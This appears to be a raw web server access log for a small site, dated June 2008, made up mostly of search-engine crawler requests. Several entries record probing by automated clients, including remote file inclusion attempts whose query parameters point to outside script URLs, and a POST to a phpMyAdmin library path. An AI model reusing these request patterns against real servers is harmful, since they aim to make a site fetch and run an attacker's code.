72.30.216.100 - - [03/Jun/2008:02:17:09 +0200] "GET /f-rez.html HTTP/1.0" 200 9765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.216.100 - - [03/Jun/2008:02:17:10 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.66.4 - - [03/Jun/2008:02:37:55 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.4 - - [03/Jun/2008:02:37:55 +0200] "GET /3dsf3/sendi/body.html HTTP/1.1" 200 1322 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.195.58.156 - - [03/Jun/2008:02:38:14 +0200] "GET /framez-rez.html HTTP/1.0" 200 4323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.58.156 - - [03/Jun/2008:02:38:16 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.58.156 - - [03/Jun/2008:02:38:21 +0200] "GET /f-rez.html HTTP/1.0" 200 9765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.58.156 - - [03/Jun/2008:02:38:26 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [03/Jun/2008:02:40:47 +0200] "GET /menue.html HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.66.4 - - [03/Jun/2008:02:52:41 +0200] "GET /schubb/schubb-1.html HTTP/1.1" 200 9070 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.4 - - [03/Jun/2008:03:07:25 +0200] "GET /search.html HTTP/1.1" 200 1440 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.211.170 - - [03/Jun/2008:03:16:07 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.1" 200 2129 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.66.4 - - [03/Jun/2008:03:28:05 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.1" 200 2129 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.8.121 - - [03/Jun/2008:03:38:34 +0200] "GET /DgH/rampe/index.html HTTP/1.0" 200 2056 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.145.17.190 - - [03/Jun/2008:03:52:04 +0200] "GET /robots.txt HTTP/1.0" 200 64 "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)"
216.145.17.190 - - [03/Jun/2008:03:52:04 +0200] "GET / HTTP/1.1" 200 10127 "http://www.whois.sc/various-euro.com" "SurveyBot/2.3 (Whois Source)"
67.195.37.109 - - [03/Jun/2008:03:55:42 +0200] "GET /zampa HTTP/1.0" 301 375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [03/Jun/2008:03:55:52 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.54.61 - - [03/Jun/2008:04:01:10 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.192.58.2 - - [03/Jun/2008:04:01:19 +0200] "GET /?pg=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 10127 "-" "libwww-perl/5.803"
67.195.52.48 - - [03/Jun/2008:04:08:17 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.0" 200 2129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.167 - - [03/Jun/2008:04:42:50 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.167 - - [03/Jun/2008:04:42:50 +0200] "GET /neon/europa.html HTTP/1.1" 200 389 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
69.145.109.96 - - [03/Jun/2008:04:58:44 +0200] "GET / HTTP/1.1" 200 10127 "http://www.randomwebsite.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.145.109.96 - - [03/Jun/2008:04:58:45 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.145.109.96 - - [03/Jun/2008:04:58:45 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.145.109.96 - - [03/Jun/2008:04:58:48 +0200] "GET /framez.html HTTP/1.1" 200 3883 "http://www.various-euro.com/framez_0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.145.109.96 - - [03/Jun/2008:04:58:49 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.145.109.96 - - [03/Jun/2008:04:58:49 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5834 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.145.109.96 - - [03/Jun/2008:04:58:49 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.145.109.96 - - [03/Jun/2008:04:58:49 +0200] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.145.109.96 - - [03/Jun/2008:04:58:50 +0200] "GET /eurosign3.gif HTTP/1.1" 200 7879 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
69.145.109.96 - - [03/Jun/2008:04:58:50 +0200] "GET /bannerz/goolag_468.jpg HTTP/1.1" 200 28285 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
208.36.144.10 - - [03/Jun/2008:05:12:18 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
208.36.144.6 - - [03/Jun/2008:05:16:26 +0200] "GET /robots.txt HTTP/1.0" 302 363 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
65.55.211.170 - - [03/Jun/2008:05:29:14 +0200] "GET /framez-girlz.html HTTP/1.1" 200 4271 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.170 - - [03/Jun/2008:05:30:53 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.170 - - [03/Jun/2008:05:30:53 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.170 - - [03/Jun/2008:05:30:54 +0200] "GET /neon/girlz2.html HTTP/1.1" 200 2937 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.170 - - [03/Jun/2008:05:30:54 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
67.195.37.109 - - [03/Jun/2008:05:42:06 +0200] "GET /zampa/montenegro/contributions.html HTTP/1.0" 200 18843 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [03/Jun/2008:05:42:53 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.2.76.140 - - [03/Jun/2008:05:59:45 +0200] "GET / HTTP/1.1" 200 10127 "-" "Xenu Link Sleuth 1.2j"
67.195.37.109 - - [03/Jun/2008:06:12:35 +0200] "GET /schubb/schubb-5.html HTTP/1.0" 200 72944 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.1.215.165 - - [03/Jun/2008:06:33:56 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
74.6.18.235 - - [03/Jun/2008:07:11:30 +0200] "GET /robots.txt HTTP/1.0" 302 363 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.235 - - [03/Jun/2008:07:11:30 +0200] "GET /zampa/robots.txt HTTP/1.0" 404 2748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.235 - - [03/Jun/2008:07:11:31 +0200] "GET / HTTP/1.0" 302 353 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [03/Jun/2008:07:11:32 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [03/Jun/2008:07:22:45 +0200] "GET /neon/code.html HTTP/1.0" 200 1109 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [03/Jun/2008:07:30:25 +0200] "GET /partnergegenberlin.html HTTP/1.0" 200 5022 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.252.149.16 - - [03/Jun/2008:07:58:00 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.16 - - [03/Jun/2008:07:58:06 +0200] "GET /framez.html HTTP/1.1" 200 3883 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.16 - - [03/Jun/2008:07:58:27 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.16 - - [03/Jun/2008:07:58:27 +0200] "GET /frame-inhalt.html HTTP/1.1" 200 5834 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
193.252.149.16 - - [03/Jun/2008:07:58:27 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
222.153.137.47 - - [03/Jun/2008:08:14:13 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
222.153.137.47 - - [03/Jun/2008:08:15:35 +0200] "GET / HTTP/1.1" 302 353 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
222.153.137.47 - - [03/Jun/2008:08:15:35 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
67.195.37.109 - - [03/Jun/2008:08:39:05 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [03/Jun/2008:08:39:06 +0200] "GET /zampa-lovers/index.html HTTP/1.0" 200 37790 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [03/Jun/2008:08:43:35 +0200] "GET /zampa-lovers/ HTTP/1.0" 200 37790 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.21.98 - - [03/Jun/2008:09:10:56 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.94 - - [03/Jun/2008:09:10:56 +0200] "GET /f-sponsor.html HTTP/1.0" 200 8578 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.72.9.25 - - [03/Jun/2008:09:17:46 +0200] "POST /phpMyAdmin/libraries/grab_globals.lib.php HTTP/1.1" 404 2748 "http://various-euro.com/phpMyAdmin/libraries/grab_globals.lib.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
74.6.8.121 - - [03/Jun/2008:09:23:20 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [03/Jun/2008:09:23:20 +0200] "GET /neon/lips.html HTTP/1.0" 200 1640 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [03/Jun/2008:09:57:56 +0200] "GET /logs/usage_200707.html HTTP/1.0" 200 110942 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.189.9.135 - - [03/Jun/2008:10:08:56 +0200] "GET /?pg=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 10127 "-" "libwww-perl/5.811"
74.6.8.121 - - [03/Jun/2008:10:27:09 +0200] "GET /games/virtualcop/virtualcop.swf HTTP/1.0" 200 2563562 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [03/Jun/2008:10:46:14 +0200] "GET /logs/usage_200706.html HTTP/1.0" 200 107008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.158 - - [03/Jun/2008:10:56:25 +0200] "GET /robots.txt HTTP/1.1" 302 363 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.158 - - [03/Jun/2008:10:56:25 +0200] "GET /zampa/robots.txt HTTP/1.1" 404 2748 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.158 - - [03/Jun/2008:10:56:26 +0200] "GET / HTTP/1.1" 302 353 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.158 - - [03/Jun/2008:10:57:36 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.158 - - [03/Jun/2008:10:57:37 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.8.121 - - [03/Jun/2008:10:57:32 +0200] "GET /rez/327.mp3 HTTP/1.0" 200 2771948 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
204.244.227.3 - - [03/Jun/2008:11:03:19 +0200] "GET /zampa-lovers/errors.php?error=http://www.geocities.com/kitfacil167/id1.txt???? HTTP/1.1" 404 2748 "-" "libwww-perl/5.812"
204.244.227.3 - - [03/Jun/2008:11:03:20 +0200] "GET /errors.php?error=http://www.geocities.com/kitfacil167/id1.txt???? HTTP/1.1" 404 2748 "-" "libwww-perl/5.812"
65.55.212.216 - - [03/Jun/2008:11:13:05 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [03/Jun/2008:11:13:06 +0200] "GET /f-rez.html HTTP/1.0" 200 9765 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
209.19.152.65 - - [03/Jun/2008:11:27:01 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt)"
67.195.37.109 - - [03/Jun/2008:11:31:30 +0200] "GET /neon/euro.html HTTP/1.0" 200 2212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.254 - - [03/Jun/2008:11:43:09 +0200] "GET /schubb/schubb-2.html HTTP/1.0" 200 16660 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.212.216 - - [03/Jun/2008:11:50:26 +0200] "GET /f-contact.html HTTP/1.0" 200 6804 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
67.195.52.43 - - [03/Jun/2008:11:54:49 +0200] "GET /zampa HTTP/1.0" 301 375 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.43 - - [03/Jun/2008:11:54:59 +0200] "GET /zampa/ HTTP/1.0" 200 7153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.169 - - [03/Jun/2008:12:44:18 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.169 - - [03/Jun/2008:12:44:19 +0200] "GET /neon/girl-tv.html HTTP/1.1" 200 1717 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.162 - - [03/Jun/2008:12:44:40 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.211.162 - - [03/Jun/2008:12:44:40 +0200] "GET /framez-e-count.html HTTP/1.1" 200 4321 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
67.195.51.246 - - [03/Jun/2008:12:45:50 +0200] "GET /sendi-agent/Interfiction-sendi.avi HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.211.162 - - [03/Jun/2008:12:48:05 +0200] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.162 - - [03/Jun/2008:12:48:05 +0200] "GET /frame-menu.html HTTP/1.1" 200 10492 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.162 - - [03/Jun/2008:12:48:06 +0200] "GET /e-counter.html HTTP/1.1" 200 4047 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.211.162 - - [03/Jun/2008:12:48:06 +0200] "GET /frame-unten.html HTTP/1.1" 200 5308 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.165.12 - - [03/Jun/2008:12:50:55 +0200] "GET /framez-e-count.html HTTP/1.0" 200 4321 "http://search.live.com/results.aspx?q=various&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.12 - - [03/Jun/2008:12:50:55 +0200] "GET /e-counter.html HTTP/1.0" 200 4047 "http://www.various-euro.com/framez-e-count.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.12 - - [03/Jun/2008:12:50:55 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "http://www.various-euro.com/framez-e-count.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
65.55.165.12 - - [03/Jun/2008:12:50:55 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://www.various-euro.com/framez-e-count.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)"
67.195.51.248 - - [03/Jun/2008:12:52:55 +0200] "GET /zampa/lybia/index.html HTTP/1.0" 200 3036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.181 - - [03/Jun/2008:12:53:41 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.181 - - [03/Jun/2008:12:53:42 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.21.98 - - [03/Jun/2008:12:55:08 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.54.41 - - [03/Jun/2008:12:55:09 +0200] "GET /zampa/lybia/ HTTP/1.0" 200 3036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.226.187 - - [03/Jun/2008:12:55:44 +0200] "GET / HTTP/1.0" 200 10127 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [03/Jun/2008:12:56:58 +0200] "GET /bmpp/ HTTP/1.0" 403 1223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.92.172.106 - - [03/Jun/2008:13:13:36 +0200] "GET /restate_copy.html HTTP/1.1" 200 97631 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:13:52 +0200] "GET /menue.html HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:13:56 +0200] "GET /euro.html HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:13:56 +0200] "GET /warez.html HTTP/1.1" 200 9754 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:14:03 +0200] "GET /web.html HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:14:04 +0200] "GET /net.html HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:14:04 +0200] "GET /world.html HTTP/1.1" 200 16295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:14:16 +0200] "GET /channel1.html HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:14:17 +0200] "GET /search.html HTTP/1.1" 200 1440 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:14:18 +0200] "GET /contact.html HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:14:21 +0200] "GET /tour1_new.html HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:14:22 +0200] "GET /logz.html HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:14:23 +0200] "GET /logz_old.html HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.92.172.106 - - [03/Jun/2008:13:14:24 +0200] "GET /bannnerz.html HTTP/1.1" 404 2748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
128.54.59.208 - - [03/Jun/2008:13:20:55 +0200] "GET / HTTP/1.0" 200 10127 "http://www.modukit.com/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b5) Gecko/2008040514 Firefox/3.0b5"
65.55.212.216 - - [03/Jun/2008:13:23:58 +0200] "GET /schubb/schubb-2.html HTTP/1.0" 200 16660 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [03/Jun/2008:13:45:33 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5834 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
67.195.37.109 - - [03/Jun/2008:13:46:54 +0200] "GET /framez_0.html HTTP/1.0" 200 12444 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.72.9.25 - - [03/Jun/2008:13:59:50 +0200] "GET /join.html? HTTP/1.1" 404 2748 "http://various-euro.com/join.html?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
65.55.212.216 - - [03/Jun/2008:14:06:28 +0200] "GET /framez-contact.html HTTP/1.0" 200 4325 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
67.195.51.216 - - [03/Jun/2008:15:20:54 +0200] "GET /framez-rez.html HTTP/1.0" 200 4323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.216 - - [03/Jun/2008:15:21:03 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.216 - - [03/Jun/2008:15:21:13 +0200] "GET /f-rez.html HTTP/1.0" 200 9765 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.72.9.25 - - [03/Jun/2008:15:21:20 +0200] "POST /index.php HTTP/1.1" 404 2748 "http://various-euro.com/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
67.195.51.216 - - [03/Jun/2008:15:21:23 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.181 - - [03/Jun/2008:15:29:30 +0200] "GET /framez.html HTTP/1.0" 200 3883 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.181 - - [03/Jun/2008:15:29:31 +0200] "GET /frame-inhalt.html HTTP/1.0" 200 5834 "http://various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.181 - - [03/Jun/2008:15:29:31 +0200] "GET /frame-menu.html HTTP/1.0" 200 10492 "http://various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.181 - - [03/Jun/2008:15:29:31 +0200] "GET /frame-unten.html HTTP/1.0" 200 5308 "http://various-euro.com/framez.html" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [03/Jun/2008:15:35:50 +0200] "GET /rez/326.mp3 HTTP/1.0" 200 7672484 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [03/Jun/2008:15:52:41 +0200] "GET /zampa/lybia/index.html HTTP/1.0" 200 3036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
